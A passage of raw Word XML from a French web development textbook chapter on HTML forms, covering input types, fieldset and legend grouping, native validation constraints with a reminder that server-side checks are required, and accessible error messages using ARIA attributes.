        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="177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search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Recherche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="354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Avec bouton d'effacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1771"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3541"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Masqué</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="177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checkbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Choix multiple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="354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Case à cocher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1771"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>radio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Choix unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3541"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bouton radio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="177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file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="354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Sélecteur de fichiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un formulaire complet, groupé et étiqueté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&lt;form action="/inscription" method="post" novalidate&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;fieldset&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;legend&gt;Vos coordonnées&lt;/legend&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="prenom"&gt;Prénom&lt;/label&gt;</w:t>
        <w:br/>
        <w:t>&lt;input id="prenom" name="prenom" type="text" autocomplete="given-name"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      required&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="naissance"&gt;Date de naissance&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input id="naissance" name="naissance" type="date" autocomplete="bday"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="tel"&gt;Téléphone&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input id="tel" name="tel" type="tel" inputmode="tel"</w:t>
        <w:br/>
        <w:t xml:space="preserve">           autocomplete="tel" pattern="[0-9+ ]{8,15}"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/fieldset&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;fieldset&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;legend&gt;Votre besoin&lt;/legend&gt;</w:t>
        <w:br/>
        <w:t>&lt;label&gt;&lt;input type="radio" name="besoin" value="site"&gt; Un site vitrine&lt;/label&gt;</w:t>
        <w:br/>
        <w:t>&lt;label&gt;&lt;input type="radio" name="besoin" value="app"&gt; Une application&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/fieldset&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="submit"&gt;Envoyer&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fieldset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>legend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> regroupent des champs qui appartiennent à une même question. Pour un groupe de boutons radio, le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>legend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> joue le rôle de question et chaque </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> celui de réponse : c'est la seule structure correctement annoncée par les lecteurs d'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.4 Validation native</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML5 valide les champs avant l'envoi : champ requis vide, adresse électronique mal formée, nombre hors bornes. Cette validation améliore le confort, mais elle est </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>contournable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et ne remplace jamais le contrôle serveur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq contraintes déclaratives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&lt;input type="email" required&gt;</w:t>
        <w:br/>
        <w:t>&lt;input type="number" min="1" max="99" step="1"&gt;</w:t>
        <w:br/>
        <w:t>&lt;input type="text" minlength="3" maxlength="40"&gt;</w:t>
        <w:br/>
        <w:t>&lt;input type="text" pattern="[A-Za-z0-9_-]{3,16}"&gt;</w:t>
        <w:br/>
        <w:t>&lt;input type="date" min="2026-01-01" max="2026-12-31"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f12.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.12 — Le parcours de validation d'un formulaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le message d'erreur natif est court et localisé par le navigateur. Pour un message rédigé, on utilise l'API de contrainte en JavaScript — nous y reviendrons au chapitre 28. En HTML pur, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut compléter un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, mais son affichage reste inégal.</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LA VALIDATION NATIVE NE SÉCURISE RIEN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un utilisateur peut désactiver JavaScript, modifier le HTML ou envoyer une requête forgée. La validation côté serveur est la seule barrière fiable ; celle du navigateur est une aide à la saisie.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.5 Erreurs, aide et états</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un bon formulaire prévient l'erreur plutôt que de la signaler. Trois moyens : indiquer le format attendu avant la saisie, accepter les formats variés (espaces dans un numéro), et ne demander que le strict nécessaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Aide, erreur et association explicite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&lt;div class="champ"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;label for="mdp"&gt;Mot de passe&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input id="mdp" name="mdp" type="password" required</w:t>
        <w:br/>
        <w:t xml:space="preserve">         aria-describedby="mdp-aide mdp-erreur"</w:t>
        <w:br/>
        <w:t xml:space="preserve">         aria-invalid="true"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p id="mdp-aide" class="aide"&gt;Au moins 12 caractères, dont un chiffre.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p id="mdp-erreur" class="erreur" role="alert"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Le mot de passe doit contenir au moins 12 caractères.</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.27 — Cinq attributs pour un formulaire qui se comprend</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55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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Fonction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>aria-describedby</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Relie une aide ou une erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Peut pointer plusieurs identifiants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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aria-invalid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Signale un champ en erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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À mettre à jour dynamiquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>role="alert"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Annonce immédiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À réserver aux erreurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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aria-live="polite"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Annonce différée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Messages de succès</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>aria-busy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Indique un traitement en cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sur la zone concernée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le message d'erreur doit dire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ce qui ne va pas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>comment corriger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. « Erreur de saisie » ne sert à rien ; « Le code postal doit comporter cinq chiffres » permet de corriger immédiatement.</w:t>
      </w:r>
    </w:p>
    <w:p>
